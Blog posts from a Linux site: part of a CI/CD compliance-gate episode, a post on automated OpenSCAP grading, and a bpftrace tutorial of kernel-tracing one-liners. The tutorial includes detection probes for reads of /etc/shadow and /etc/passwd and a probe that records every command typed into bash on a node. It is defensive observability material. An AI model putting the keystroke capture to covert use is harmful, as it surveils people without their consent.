Token rotation: The STRATUM_TOKEN used for API authentication should be rotated on the same schedule as other service credentials. Use environment-specific tokens so a compromised staging token doesn’t bypass a production gate.

Webhook notifications on gate failure: The Pipeline API can send a webhook to Slack, PagerDuty, or any endpoint when a gate fails. Configure this for production pipelines so failures are visible beyond the CI log.

# In the Stratum config
notifications:
  pipeline_failures:
    - type: slack
      webhook: ${SLACK_WEBHOOK}
      channel: "#platform-security"
    - type: webhook
      url: ${PAGERDUTY_WEBHOOK}
      min_grade: D     # only page on D/F, not B/C failures

Key Takeaways

A CI/CD compliance gate turns a compliance grade from a dashboard metric into a pipeline constraint — the image doesn’t deploy if it doesn’t pass
POST /api/pipeline/scan is a single HTTP call that any CI/CD system can make — no agent, no plugin, no SDK required
Failed gate output is actionable: every failing control includes the specific fix, not just the control ID
Runtime gates check instances after configuration, not just at image build time
Environment-specific thresholds let development move faster while enforcing the highest standard at production

What’s Next

The CI/CD compliance gate closes the final gap: even if an unhardened image gets built, it can’t deploy. EP05 is the bookmark episode — this is the point where OS hardening becomes structurally enforced rather than procedurally expected.

EP06 is the series closer. For five episodes, you’ve been using Stratum as a user. What does it look like to run it yourself — extend it with a custom control, add a provider, deploy the platform in your own infrastructure?

Stratum is open-core (Apache 2.0). EP06 is the architecture reveal, the GitHub release, and the extension guide for everything the series taught.

Next: Stratum — open-source OS hardening platform for multi-cloud infrastructure

Get EP06 in your inbox when it publishes → linuxcent.com/subscribe

The post The Pipeline Gate — Hardened Images as a CI/CD Build Constraint appeared first on Linuxcent.

Compliance Grading — Automated OpenSCAP with A-F Scores Before Deployment

Vamshi Krishna Santhapuri — Fri, 15 May 2026 02:00:00 +0000

Reading Time: 6 minutes

OS Hardening as Code, Episode 4
Cloud AMI Security Risks · Linux Hardening as Code · Multi-Cloud OS Hardening · Automated OpenSCAP Compliance

TL;DR

“We use CIS L1” means nothing without a verified grade — automated OpenSCAP compliance provides one before any instance is deployed
Stratum runs OpenSCAP after every build and attaches the grade to the image metadata: cis-l1-A-94
Grades are A through F based on percentage of controls passing, with explicit accounting for documented overrides
SARIF output is machine-readable — importable directly into GitHub Advanced Security, Jira, or any SIEM
Drift detection: rescan any running instance against the original blueprint and see exactly which controls changed since the image was built
An image that scores below your minimum grade threshold doesn’t get snapshotted — it doesn’t exist

The Problem: A Grade That’s Never Been Verified Is Not a Grade

Security audit request:
"Provide CIS L1 compliance evidence for all production instances"

Team response:
  Instance A: "CIS L1 hardened" — OpenSCAP last run: 4 months ago
  Instance B: "CIS L1 hardened" — OpenSCAP last run: never
  Instance C: "CIS L1 hardened" — OpenSCAP version: 1.2 (current: 1.3.8)
  Instance D: "CIS L1 hardened" — manual scan output: "87% passing"
  Instance E: "CIS L1 hardened" — manual scan output: "91% passing"

"Which profile was used for D and E? Are they comparable?"
"Were they scanned before or after a recent kernel update?"
"Why is C running an old OpenSCAP version?"

Automated OpenSCAP compliance means the grade is generated the same way, on every image, every time, before the image is ever deployed.

EP03 showed that the same HardeningBlueprint YAML builds consistent OS images across six cloud providers. What it left open is the question every auditor eventually asks: how do you know the Ansible hardening actually did what you think it did? Running Ansible-Lockdown successfully means the tasks ran. It does not mean every CIS control is satisfied — some controls can’t be applied by Ansible alone, some require manual verification, and some interact with the environment in unexpected ways.

A compliance team requested CIS L2 evidence for a SOC 2 Type II audit. The security team had been running OpenSCAP scans — but manually, on-demand, using slightly different profiles across teams, with no standard for how to store or compare results.

The audit found four problems:
1. Two instances had been scanned with CIS L1, not L2, despite being labeled “CIS L2”
2. Three instances hadn’t been scanned in over six months
3. The scan outputs from different teams were in different formats (HTML vs XML vs text)
4. Two instances showed “91% passing” and “89% passing” — with no documentation of whether those were acceptable thresholds or what the failing controls were

The audit took two weeks to resolve. The finding wasn’t a security failure — it was a documentation and process failure. But it consumed two weeks of engineering time and appeared in the audit report as a gap.

The root cause: compliance scanning was a manual step that produced inconsistent output in an inconsistent format.

How Automated OpenSCAP Compliance Works

Every Stratum build ends with an automated OpenSCAP scan:

stratum build --blueprint ubuntu22-cis-l1.yaml --provider aws
      │
      ├─ Provisions build instance
      │
      ├─ Runs Ansible-Lockdown (144 tasks)
      │
      ├─ Runs post-build OpenSCAP scan
      │    ├── Profile: CIS Ubuntu 22.04 L1 (from blueprint)
      │    ├── OpenSCAP version: pinned in blueprint (default: latest)
      │    └── 100 controls checked
      │
      ├─ Calculates grade
      │    ├── Passing:   92 controls
      │    ├── Failing:   6 controls
      │    ├── Overrides: 2 (documented in blueprint)
      │    └── Grade: A (94/100 effective)
      │
      ├─ Writes to image metadata:
      │    compliance_grade=cis-l1-A-94
      │    compliance_scan_date=2026-04-19
      │    compliance_blueprint=ubuntu22-cis-l1.yaml@v1.2
      │
      └─ Snapshots AMI (or fails if grade < min_grade)

The grade is written into the AMI (or GCP/Azure image) metadata at creation time. It travels with the image. Any instance launched from this AMI carries the provenance of what was applied and what grade was achieved.

The A-F Grade Calculation

The grade is not a simple percentage. It accounts for documented overrides and applies a threshold-based letter scale:

Total CIS controls:    100
Passing:               92
Failing:               6 (genuine failures)
Overrides (compliant): 2 (documented in blueprint, counted as passing)

Effective passing:     94 / 100
Grade:                 A

Grade thresholds (configurable per blueprint):

Grade	Default threshold	Meaning
A	≥ 95% effective	Production-ready, minimal exceptions
B	85–94%	Acceptable with documented exceptions
C	70–84%	Below standard — deploy with caution
D	55–69%	Significant gaps — do not deploy to production
F	< 55%	Hardening failed — image not snapshotted

The thresholds are configurable in the blueprint:

compliance:
  benchmark: cis-l1
  controls: all
  min_grade: B          # Build fails if grade < B
  grade_thresholds:
    A: 95
    B: 85
    C: 70
    D: 55

If the build produces a grade below min_grade, the instance is terminated and no image is created. The failure is logged with the full list of controls that blocked the grade.
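The calculation can be sketched as two small functions: one for the effective score, one for the letter. This assumes the default cutoffs from the table and treats documented overrides as passing; it is an illustration of the rule, not Stratum's code.

```python
DEFAULT_THRESHOLDS = {"A": 95, "B": 85, "C": 70, "D": 55}


def effective_score(passing, overrides, total):
    """Percentage of controls that pass, counting documented overrides."""
    return 100 * (passing + overrides) / total


def letter_grade(score, thresholds=DEFAULT_THRESHOLDS):
    """Map a percentage to a letter using the highest cutoff it reaches."""
    for letter in ("A", "B", "C", "D"):
        if score >= thresholds[letter]:
            return letter
    return "F"


strong = letter_grade(effective_score(passing=94, overrides=2, total=100))
borderline = letter_grade(effective_score(passing=92, overrides=2, total=100))
```

With these default cutoffs an effective score of 94 falls in the B band, so a build that reports A at 94 would need a blueprint with a lower A cutoff.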

Reading the Scan Output

# Show the last build's scan results
stratum scan --show-last --blueprint ubuntu22-cis-l1.yaml

# Output:
# Build: ubuntu22-cis-l1 @ 2026-04-19T15:42:01Z
# Provider: aws (ap-south-1)
# Grade: A (94/100 effective controls)
#
# Passing controls: 92
# Failing controls: 6
# ──────────────────────────────────────────────
# FAIL  1.1.7   Ensure separate partition for /var/log/audit
#       Reason: tmpfs used — separate block device not configured
#       Remediation: Add /var/log/audit to separate EBS volume
#
# FAIL  1.6.1.3 Ensure AppArmor is enabled in bootloader config
#       Reason: GRUB_CMDLINE_LINUX missing apparmor=1 security=apparmor
#       Remediation: Update /etc/default/grub, run update-grub, reboot
#
# FAIL  3.1.1   Ensure IPv6 is disabled if not needed
#       Reason: net.ipv6.conf.all.disable_ipv6=0
#       Remediation: Set in /etc/sysctl.d/60-kernel-hardening.conf
# ...
#
# Overrides (compliant): 2
# ──────────────────────────────────────────────
# OVERRIDE  1.1.2   tmpfs /tmp via systemd unit — equivalent control
# OVERRIDE  5.2.4   SSH timeout managed by session manager policy

The failing controls tell you exactly what to fix and how to fix it. This is the difference between “87% passing” as a number and “87% passing” as an actionable gap list.

SARIF Export

Every scan produces a SARIF (Static Analysis Results Interchange Format) file:

# Export scan results to SARIF
stratum scan \
  --instance i-0abc123 \
  --benchmark cis-l1 \
  --output sarif \
  --out-file scan-results/i-0abc123-cis-l1.sarif

SARIF is the standard format for security scan results. It’s directly importable into:

GitHub Advanced Security: upload via github/codeql-action/upload-sarif, results appear in the Security tab
Jira: import as security findings, linked to the image or instance ID
Splunk / SIEM: structured JSON, parseable as events
AWS Security Hub: importable as findings via the Security Hub API once converted to the AWS Security Finding Format (ASFF)

For audit purposes, the SARIF file is the evidence artifact. It contains the full scan profile, every control result, the OpenSCAP version, the scan timestamp, and the machine it was run against.
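For readers who have not seen the format, here is roughly what a minimal SARIF 2.1.0 document looks like when built by hand. This is a sketch: the severity-to-level mapping and the tool name are assumptions, and a real scan export would carry far more detail (profile, timestamps, target machine).

```python
import json

# Assumed mapping from control severity to SARIF result level
LEVELS = {"high": "error", "medium": "warning", "low": "note"}


def to_sarif(tool_name, failing_controls):
    """Build a minimal SARIF 2.1.0 log with one result per failing control."""
    rules = [
        {"id": c["id"], "shortDescription": {"text": c["title"]}}
        for c in failing_controls
    ]
    results = [
        {
            "ruleId": c["id"],
            "level": LEVELS.get(c["severity"], "warning"),
            "message": {"text": c["title"]},
        }
        for c in failing_controls
    ]
    return {
        "$schema": "https://json.schemastore.org/sarif-2.1.0.json",
        "version": "2.1.0",
        "runs": [{
            "tool": {"driver": {"name": tool_name, "rules": rules}},
            "results": results,
        }],
    }


controls = [
    {"id": "1.1.7", "title": "Separate partition for /var/log/audit", "severity": "high"},
    {"id": "3.3.2", "title": "TCP SYN cookies enabled", "severity": "medium"},
]
sarif_doc = to_sarif("example-scanner", controls)
sarif_text = json.dumps(sarif_doc, indent=2)
```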

# Upload to GitHub Advanced Security
stratum scan \
  --instance i-0abc123 \
  --benchmark cis-l1 \
  --output sarif \
  --github-upload \
  --github-ref $GITHUB_REF \
  --github-sha $GITHUB_SHA

Drift Detection

The grade at build time is the baseline. Any instance can be rescanned against the blueprint that built it:

# Rescan a running instance
stratum scan --instance i-0abc123 --blueprint ubuntu22-cis-l1.yaml

# Output:
# Instance: i-0abc123 (launched from ami-0a7f3c9e82d1b4c05)
# Original grade (build):  A (94/100) — 2026-01-15
# Current grade (rescan):  B (87/100) — 2026-04-19
#
# Drifted controls (7):
#   3.3.2  TCP SYN cookies: FAIL — net.ipv4.tcp_syncookies=0
#           Last passing: 2026-01-15 (build)
#           Current value: 0 (expected: 1)
#
#   5.3.2  sudo log_input: FAIL — rule removed from /etc/sudoers.d/
#           Last passing: 2026-01-15 (build)
#           Current value: [rule absent] (expected: Defaults log_input)

Drift detection is how you find the instances that were “temporarily” modified and never reverted. The scan compares the current state against the baseline — not against a generic CIS profile, but against the specific blueprint version that built the image.
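At its core, drift detection is a comparison of two result sets. A minimal sketch, assuming each scan can be reduced to a mapping of control ID to "pass" or "fail" (a simplification of what a real scan records):

```python
def drifted_controls(baseline, current):
    """Controls that passed at build time but fail in the rescan."""
    return sorted(
        control_id
        for control_id, result in baseline.items()
        if result == "pass" and current.get(control_id) == "fail"
    )


baseline = {"3.3.2": "pass", "5.3.2": "pass", "1.1.7": "fail", "5.2.21": "pass"}
current = {"3.3.2": "fail", "5.3.2": "fail", "1.1.7": "fail", "5.2.21": "pass"}
drift = drifted_controls(baseline, current)
```

Controls that were already failing at build time (1.1.7 here) are excluded, so the list contains only what changed after deployment.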

Scanning Without a Build: Assessing Existing Instances

For instances not built with Stratum, you can run a standalone scan:

# Assess an existing instance against CIS L1
stratum scan --instance i-0legacy123 --benchmark cis-l1

# No blueprint comparison — just the raw CIS grade
# Output:
# Grade: C (72/100)
# 28 controls failing
# ...

This is useful for assessing the state of instances built before Stratum was in use, or for comparing a manual hardening approach against the benchmark.

What Controls Typically Block an A Grade

For Ubuntu 22.04 CIS L1 builds in most cloud environments, these are the controls that most commonly prevent an A grade:

Control	Why it often fails	Fix
1.1.7 `/var/log/audit` separate partition	Cloud images don’t have separate volumes at build time	Add EBS volume, configure at launch
1.6.1.3 AppArmor bootloader config	GRUB parameters not set correctly	Update `/etc/default/grub`, run `update-grub`
3.1.1 Disable IPv6	Cloud networking sometimes requires IPv6	Override with documented reason if intentional
5.2.21 SSH MaxStartups	Default sshd_config not updated	Add `MaxStartups 10:30:60` to sshd_config
6.1.10 World-writable files	Some package installations leave world-writable files	Post-install cleanup in Ansible role

The first two (separate audit partition, AppArmor bootloader) are the most common A→B blockers and often require architecture decisions about how volumes are provisioned at launch versus build time.

Key Takeaways

Automated OpenSCAP compliance means every image has a verified, reproducible grade generated by the same scanner with the same profile, before it’s ever deployed
The A-F grade accounts for documented overrides from the blueprint — the failing controls in the output are genuine gaps, not known exceptions
SARIF export makes scan results importable into GitHub Advanced Security, Jira, SIEM, and audit tooling
Drift detection catches configuration changes that happen after the image is deployed — the grade at build time is the baseline
Images that score below min_grade don’t get snapshotted — the failed build tells you exactly which controls to fix
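
The min_grade rule in the last takeaway comes down to an ordered comparison of letter grades. A minimal sketch in shell, assuming grades run from A (best) to F (worst); `grade_rank` and `meets_min_grade` are hypothetical helper names used for illustration, not part of Stratum:

```shell
# Hypothetical helpers (not Stratum's code): compare letter grades, A best, F worst.
grade_rank() {
  case "$1" in
    A) echo 0 ;; B) echo 1 ;; C) echo 2 ;;
    D) echo 3 ;; E) echo 4 ;; F) echo 5 ;;
    *) return 1 ;;          # unknown grade: the caller treats this as a failure
  esac
}

# meets_min_grade GRADE MIN: exit 0 if GRADE is at least as good as MIN.
meets_min_grade() {
  g=$(grade_rank "$1") || return 2
  m=$(grade_rank "$2") || return 2
  [ "$g" -le "$m" ]
}

if meets_min_grade C B; then echo "snapshot"; else echo "fail build"; fi
```

With a C-grade image and a minimum of B, the sketch takes the "fail build" branch, which mirrors the behaviour the takeaway describes.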

What’s Next

Automated OpenSCAP compliance gives every image a verified grade before deployment. What EP04 left open is what happens after the grade is known — specifically, what prevents an engineer from deploying a C-grade image to production “just this once.”

The Pipeline API is the answer. EP05 covers the CI/CD compliance gate: POST /api/pipeline/scan fails the build if the image grade is below threshold. The unhardened image never reaches production — not because engineers are disciplined, but because the pipeline won’t let it through.

Next: CI/CD compliance gate — block unhardened images before they reach production

The post Compliance Grading — Automated OpenSCAP with A-F Scores Before Deployment appeared first on Linuxcent.

bpftrace — Kernel Answers in One Line

Vamshi Krishna Santhapuri — Sun, 10 May 2026 02:00:00 +0000

Reading Time: 8 minutes

eBPF: From Kernel to Cloud, Episode 9
What Is eBPF? · The BPF Verifier · eBPF vs Kernel Modules · eBPF Program Types · eBPF Maps · CO-RE and libbpf · XDP · TC eBPF · bpftrace

TL;DR

bpftrace is an eBPF compiler, not a monitoring agent — every one-liner compiles, loads, runs, and cleans up a complete kernel program
(think of it like kubectl exec — but for asking the kernel a direct question, with no agent, no sidecar, no prior setup)
kretprobe and tracepoint cover most production debugging needs; use tracepoints for stability across kernel versions
The security use cases are unique: kernel-level observation that an attacker inside a container cannot suppress
Every connection, every file open, every process spawn — observable in real time with a single command, no prior instrumentation
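Production caution: high-frequency probes on hot paths add overhead; filter by pid/comm, bound every run with a timer (interval:s:N { exit(); }), and watch %si while the probe is attached
The pid built-in is the host-namespace PID, not the PID seen inside the container; use curtask->real_parent->tgid to walk up to the parent when correlating with container activity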

bpftrace turns any kernel question into a one-liner — compiling, loading, and attaching a complete eBPF program in seconds, with no agents, no restarts, and no prior instrumentation on the node. When something is wrong on a node right now and you don’t know where to look, it’s how you ask the kernel a direct question. That’s what EP09 is about.

Quick Check: Is bpftrace Available on Your Node?

Before the one-liner toolkit — verify bpftrace is installed and working on a cluster node:

# SSH into a worker node, then:
bpftrace --version
# bpftrace v0.19.0   ← any version ≥ 0.16 supports the patterns in this episode

# Verify BTF is available (required for struct access one-liners)
ls /sys/kernel/btf/vmlinux && echo "BTF available"

# The simplest possible one-liner — count syscalls for 5 seconds
bpftrace -e 'tracepoint:raw_syscalls:sys_enter { @[comm] = count(); } interval:s:5 { exit(); }'

Expected output (abridged):

Attaching 1 probe...

@[containerd]: 312
@[kubelet]:    841
@[node_exporter]: 203
@[sshd]:       47

Each line is a process name and how many syscalls it made in 5 seconds. If this runs and produces output, everything in this episode will work on your node.
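
To rank that output by count regardless of the order it was printed in, a small post-processing step helps. A sketch, where `rank_counts` is a hypothetical helper name and the sample input is the abridged output shown above:

```shell
# rank_counts: read bpftrace count-map lines ("@[key]: N") on stdin and
# print them sorted by N, largest first. Lines not starting with "@" are dropped.
rank_counts() {
  awk '/^@/ { print $NF "\t" $0 }' | sort -rn | cut -f2-
}

rank_counts <<'EOF'
Attaching 1 probe...

@[containerd]: 312
@[kubelet]:    841
@[node_exporter]: 203
@[sshd]:       47
EOF
```

On a live node the same function can sit at the end of a pipe: run the one-liner with an interval:s:5 { exit(); } clause and pipe its output into rank_counts.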

Not on a self-managed node? EKS managed nodes and GKE nodes don’t have bpftrace pre-installed, but you can run it from a privileged debug pod: kubectl debug node/ -it --image=quay.io/iovisor/bpftrace. The tool runs on the host kernel — you get full kernel visibility even from a pod.

A node in production started showing elevated TCP latency — p99 at 180ms, where p99 was normally under 10ms. The application logs were clean. The APM dashboard showed nothing unusual at the service level. CPU, memory, disk: all normal. The load balancer health checks were passing.

I had 12 minutes before the on-call escalation would have gone to the application team and started a war room.

I ran one command:

bpftrace -e 'kretprobe:tcp_recvmsg { @bytes[comm] = hist(retval); } interval:s:10 { exit(); }'

Ten seconds of sampling. The histogram output showed a single process — backup-agent — receiving 4MB chunks at irregular intervals. Not the application. Not the service mesh. A backup agent that runs at the infrastructure layer, saturating the receive path with large reads during its scheduled window.

Found in 9 seconds. War room averted.

What made that possible is something most engineers don’t know about bpftrace: that one-liner is not a monitoring query. It’s a complete eBPF program — compiled, loaded into the kernel, attached to the tcp_recvmsg kernel return probe, run, and cleaned up — all in ten seconds. bpftrace is a compiler that happens to have a very convenient command-line interface.

What bpftrace Actually Is

bpftrace is not a monitoring tool. It’s an eBPF compiler with a high-level scripting language designed for one-shot investigation.

When you run bpftrace -e 'kretprobe:tcp_recvmsg { ... }', this is what happens:

Your one-liner
      ↓
bpftrace's built-in LLVM/Clang frontend
      ↓
eBPF bytecode (.bpf.o in memory)
      ↓
Kernel verifier validates the program
      ↓
JIT compiler compiles to native machine code
      ↓
Program attaches to tcp_recvmsg kretprobe
      ↓
Runs until Ctrl-C or an exit() call
      ↓
Output printed, maps freed, program detached

The kernel doesn’t know bpftrace wrote the program. It’s the same path as Falco, Cilium, Tetragon — kernel program loaded via the BPF syscall, verified, JIT-compiled, attached to a probe. bpftrace just wraps that entire process in a scripting language that takes 30 seconds to write instead of an afternoon.

This is why bpftrace can answer questions that no other tool can: it compiles to a kernel-level observer that fires on any event in the kernel, on any process, on any container — without any prior instrumentation.

The Four Probe Types You’ll Use Most

bpftrace supports 20+ probe types. These four cover 90% of production debugging:

kprobe / kretprobe — Kernel Functions

Attaches to the entry (kprobe) or return (kretprobe) of any kernel function. The most powerful probes for understanding what the kernel is actually doing.

# Fire on every call to tcp_connect — who's making new TCP connections?
bpftrace -e 'kprobe:tcp_connect { printf("%s PID %d connecting\n", comm, pid); }'

# On return from tcp_recvmsg — how large are the reads per process?
bpftrace -e 'kretprobe:tcp_recvmsg { @[comm] = hist(retval); }'

# Count calls to vfs_write per process (file write activity)
bpftrace -e 'kprobe:vfs_write { @[comm] = count(); }'

Limitation: kernel functions are internal and can change between kernel versions. Use tracepoints (below) for stability when you can.

kprobe instability: The compiler can inline a function targeted by a kprobe, embedding its code at the call sites with no separate entry point. A fully inlined function has no symbol to attach to, and a partially inlined one fires only for the calls that were not inlined, so the probe under-reports without any error. Verify before relying on one: bpftrace -l 'kprobe:function_name'. An empty result means the function is not probeable on this kernel (inlined, renamed, or removed). Use a tracepoint equivalent instead.
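
A function that is absent from the kernel symbol table cannot be probed. As a quick pre-check that does not need bpftrace itself, here is a sketch that looks the name up in /proc/kallsyms. `has_kernel_symbol` is a hypothetical helper, and its optional second argument (an alternate symbol file) exists only so the function can be exercised off-node. A hit means the symbol exists, not that every call site goes through it.

```shell
# has_kernel_symbol NAME [SYMFILE]: exit 0 if NAME is a text symbol in SYMFILE
# (default /proc/kallsyms). kallsyms lines look like: "<addr> <type> <name> [module]".
has_kernel_symbol() {
  awk -v name="$1" '
    ($2 == "t" || $2 == "T") && $3 == name { found = 1; exit }
    END { exit found ? 0 : 1 }
  ' "${2:-/proc/kallsyms}"
}

if has_kernel_symbol tcp_connect; then
  echo "tcp_connect: present"
else
  echo "tcp_connect: not found (inlined, renamed, or kallsyms unreadable)"
fi
```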

tracepoint — Stable Kernel Trace Points

Tracepoints are static hooks placed deliberately in the kernel source. Unlike kprobes, they are maintained as a stable interface: their names and arguments rarely change between versions. Use these for anything you need to work reliably across a fleet with mixed kernel versions.

# Every file open — process name + filename
bpftrace -e 'tracepoint:syscalls:sys_enter_openat {
    printf("%s %s\n", comm, str(args->filename));
}'

# Every outbound connect() call: process name and PID
bpftrace -e 'tracepoint:syscalls:sys_enter_connect {
    printf("%-16s %-6d\n", comm, pid);
}'

# List the syscall tracepoints (first 30 of several hundred)
bpftrace -l 'tracepoint:syscalls:*' | head -30

uprobe — Userspace Function Probes

Attaches to a specific function in a userspace binary or library. Useful for observing application behaviour without recompiling.

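# What bash commands are being typed on this node?
# readline() returns the typed line, so read retval from a uretprobe (arg0 is only the prompt)
bpftrace -e 'uretprobe:/bin/bash:readline { printf("%s\n", str(retval)); }'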

# Python function calls
bpftrace -e 'uprobe:/usr/bin/python3:PyObject_Call { printf("Python call: pid %d\n", pid); }'

From a security standpoint: this is how you observe what an attacker is typing in an interactive shell they’ve obtained on your node — in real time, from the kernel, without touching the terminal session.

interval — Periodic Sampling

Runs a block of code on a fixed interval. Used for aggregation and periodic stats.

# Print the top file-opening processes every 5 seconds
bpftrace -e '
kprobe:vfs_open { @[comm] = count(); }
interval:s:5  { print(@); clear(@); }
'

The One-Liner Toolkit: Runnable Right Now

These run on any Linux node with BTF (kernel 5.8+, Ubuntu 20.04+, most managed K8s nodes):

# What files is every process opening right now? (30-second view)
bpftrace -e 'tracepoint:syscalls:sys_enter_openat {
    printf("%-16s %s\n", comm, str(args->filename));
}
interval:s:30 { exit(); }'

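# Who is sending UDP to port 53? (connected sockets, any container, no sidecar needed)
bpftrace -e 'kprobe:udp_sendmsg {
    $sk = (struct sock *)arg0;
    $dport = $sk->__sk_common.skc_dport;
    $port = ($dport >> 8) | (($dport << 8) & 0xff00);   // network to host byte order
    if ($port == 53) { printf("%-16s %d\n", comm, pid); }
}'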

# Latency histogram for all read() syscalls: find the slow process
bpftrace -e '
tracepoint:syscalls:sys_enter_read { @start[tid] = nsecs; }
tracepoint:syscalls:sys_exit_read /@start[tid]/ {
    // the filter skips reads that were already in flight when the probe attached
    $latency = nsecs - @start[tid];
    @latency[comm] = hist($latency);
    delete(@start[tid]);
}
interval:s:15 { exit(); }'

# Which process is using the most CPU right now? (99Hz sampling)
bpftrace -e 'profile:hz:99 { @[comm] = count(); } interval:s:10 { exit(); }'

# Real-time syscall frequency — find unusual process activity
bpftrace -e 'tracepoint:raw_syscalls:sys_enter { @[comm, args->id] = count(); } interval:s:10 { exit(); }' \
  | sort -k3 -rn | head -20

# New TCP connections over the next 30 seconds: process and destination
bpftrace -e 'kprobe:tcp_connect {
    $sk = (struct sock *)arg0;
    $dport = $sk->__sk_common.skc_dport;
    printf("%-16s → %s:%d\n", comm,
           ntop($sk->__sk_common.skc_daddr),
           ($dport >> 8) | (($dport << 8) & 0xff00));   // network to host byte order
}
interval:s:30 { exit(); }'

# What is a specific PID doing? (replace 12345)
bpftrace -e 'tracepoint:syscalls:sys_enter_openat /pid == 12345/ {
    printf("%s\n", str(args->filename));
}'

Each of these compiles and loads in under 2 seconds. They leave no persistent state. When they exit, the kernel reverts to exactly the state it was in before.
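
Socket ports such as skc_dport are stored in network byte order, so on a little-endian host the raw 16-bit value has its two bytes swapped, and a plain `>> 8` keeps only one of them. A sketch of the full swap in shell arithmetic, useful for sanity-checking a value printed by a probe; `ntohs16` is a hypothetical helper name and the little-endian host is an assumption:

```shell
# ntohs16 RAW: swap the two bytes of a 16-bit value (network <-> little-endian host).
ntohs16() {
  echo $(( (($1 >> 8) & 0xff) | (($1 << 8) & 0xff00) ))
}

ntohs16 0xbb01   # raw value a little-endian host reads for port 443
ntohs16 0x3500   # raw value for port 53
```

The two calls print 443 and 53. The same expression works inside a bpftrace program, since its integer operators follow C semantics.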

The Security Use Cases

Watching an Active Session

If you suspect a process is running commands you didn’t deploy:

# See every bash command on this node in real time (retval is the line readline returned)
bpftrace -e 'uretprobe:/bin/bash:readline { printf("%s %s\n", comm, str(retval)); }'

# Every process spawn — PID, parent, command
bpftrace -e 'tracepoint:syscalls:sys_enter_execve {
    printf("%-6d %-6d %s\n", pid, curtask->real_parent->tgid, str(args->filename));
}'

This is the kernel-level version of watching /var/log/auth.log, with one difference: root inside a container is not enough to suppress it, because the probe runs in the host's kernel space. An attacker who has compromised a container cannot prevent a bpftrace program on the host from observing their syscalls; only someone with root on the host itself can detach the probe.
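
Once a probe has printed a suspicious host PID, its ancestry can be read from /proc while the process is still alive. A sketch; `ancestry` is a hypothetical helper, and the PROC_ROOT override is there only so it can be tested against a fake tree:

```shell
# ancestry PID: print "pid name" for PID and each parent, up to PID 1.
# PROC_ROOT is a hypothetical override for testing; it defaults to /proc.
ancestry() {
  p=$1
  root=${PROC_ROOT:-/proc}
  while [ -n "$p" ] && [ "$p" -gt 0 ] && [ -r "$root/$p/status" ]; do
    name=$(awk '/^Name:/ { print $2; exit }' "$root/$p/status")
    echo "$p $name"
    p=$(awk '/^PPid:/ { print $2; exit }' "$root/$p/status")
  done
}

ancestry "$$"   # ancestry of the current shell
```

Short-lived processes may be gone by the time you look; in that case the parent PID printed by the execve probe is the only lineage you get.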

Detecting Unexpected Network Activity

# Any process making a connection to a non-standard port
bpftrace -e 'kprobe:tcp_connect {
    $sk = (struct sock *)arg0;
    $dport = $sk->__sk_common.skc_dport;
    $port = ($dport >> 8) | (($dport << 8) & 0xff00);   // network to host byte order
    if ($port != 80 && $port != 443 && $port != 53) {
        printf("%-16s port %d\n", comm, $port);
    }
}'

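# sendto() destinations over IPv4: spot DNS traffic going to resolvers you did not configure
bpftrace -e 'tracepoint:syscalls:sys_enter_sendto /args->addr != 0/ {
    $sa = (struct sockaddr_in *)args->addr;
    if ($sa->sin_family == 2) {   // 2 = AF_INET
        $p = $sa->sin_port;
        printf("%-16s → %s:%d\n", comm, ntop($sa->sin_addr.s_addr),
               ($p >> 8) | (($p << 8) & 0xff00));
    }
}'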

Watching File Access on Sensitive Paths

# Any open of /etc/passwd or /etc/shadow
bpftrace -e 'tracepoint:syscalls:sys_enter_openat {
    if (str(args->filename) == "/etc/passwd" ||
        str(args->filename) == "/etc/shadow") {
        printf("%-16s PID %-6d opened %s\n", comm, pid, str(args->filename));
    }
}'

Production Gotchas

CPU overhead: bpftrace probes fire synchronously in the traced context. High-frequency probes on hot kernel paths (vfs_read, sys_enter_* without filtering) can add 10–20% overhead. Always bound the run time (append interval:s:N { exit(); } to the program) and watch %si in top before leaving a probe attached on a production node.

Maps accumulate until exit: @[comm] = count() keeps an entry per unique comm value for the whole session, up to bpftrace's per-map key limit (BPFTRACE_MAP_KEYS_MAX, 4096 by default), after which new keys are not recorded. For long runs, print and reset on a schedule: interval:s:10 { print(@); clear(@); }.

kprobe instability: Functions targeted by kprobes can be inlined, renamed, or removed between kernel versions, leaving the probe silently ineffective. If a kprobe isn’t firing, verify the function exists: bpftrace -l 'kprobe:function_name'. If it returns nothing, the function is not probeable on this kernel. Use a tracepoint equivalent instead.

Container PIDs: PIDs inside a container are different from host PIDs. pid in bpftrace is the host namespace PID.

Container PID semantics: When a container shows PID 1 internally, the host kernel sees it as PID 8432 (or whatever was assigned). bpftrace’s pid built-in always gives you the host-namespace PID. To map a container’s PID to the host PID: cat /proc//status | grep NSpid — the second value is the PID inside the container. Or use curtask->real_parent->tgid in your probe to walk the process tree. This matters when you filter by pid in a one-liner and get no output — you may be filtering on the container-namespace PID instead of the host one.
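
The NSpid lookup can be wrapped in a small helper. A sketch, assuming a kernel that exposes the NSpid field in the process status file (Linux 4.1 and later); `container_pid` and the PROC_ROOT override are hypothetical names used for illustration:

```shell
# container_pid HOST_PID: print the PID the process has in its innermost
# PID namespace (the last NSpid field). Equals HOST_PID if it is not namespaced.
container_pid() {
  awk '/^NSpid:/ { print $NF; exit }' "${PROC_ROOT:-/proc}/$1/status"
}

container_pid "$$" || echo "status file not readable"
```

Going the other way (container PID to host PID) means scanning every status file on the host for a matching last field, which is why filtering on the host PID in the probe is usually simpler.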

BTF requirement: bpftrace requires BTF for struct field access ($sk->__sk_common.skc_daddr). If BTF is unavailable, struct access fails. Check /sys/kernel/btf/vmlinux exists before running struct-access one-liners.

Quick Reference

Probe type	Syntax	Use for
kernel function entry	`kprobe:function_name`	Function arguments
kernel function return	`kretprobe:function_name`	Return value, latency
kernel tracepoint	`tracepoint:subsys:name`	Stable, versioned hooks
userspace function	`uprobe:/path/to/bin:function`	App-level observation
CPU sampling	`profile:hz:99`	Flamegraphs, hot code
interval	`interval:s:N`	Periodic aggregation
process start	`tracepoint:syscalls:sys_enter_execve`	New process detection

Built-in variable	Value
`pid`	Process ID (host namespace)
`tid`	Thread ID
`comm`	Process name (15 chars)
`nsecs`	Nanoseconds since boot
`curtask`	Pointer to `task_struct`
`retval`	Return value (kretprobe/uretprobe; syscall exit tracepoints expose it as `args->ret`)
`args`	Probe arguments struct
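
Because comm holds at most 15 characters, a filter that compares against comm has to use the truncated name. A sketch that shows what the kernel will report for a given binary name; `comm_name` is a hypothetical helper:

```shell
# comm_name NAME: print NAME truncated to 15 characters, as the kernel stores it in comm.
comm_name() {
  printf '%.15s\n' "$1"
}

comm_name kube-controller-manager
comm_name sshd
```

The first call prints kube-controller, which is the string a comm filter would need to match; short names such as sshd pass through unchanged.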

Key Takeaways

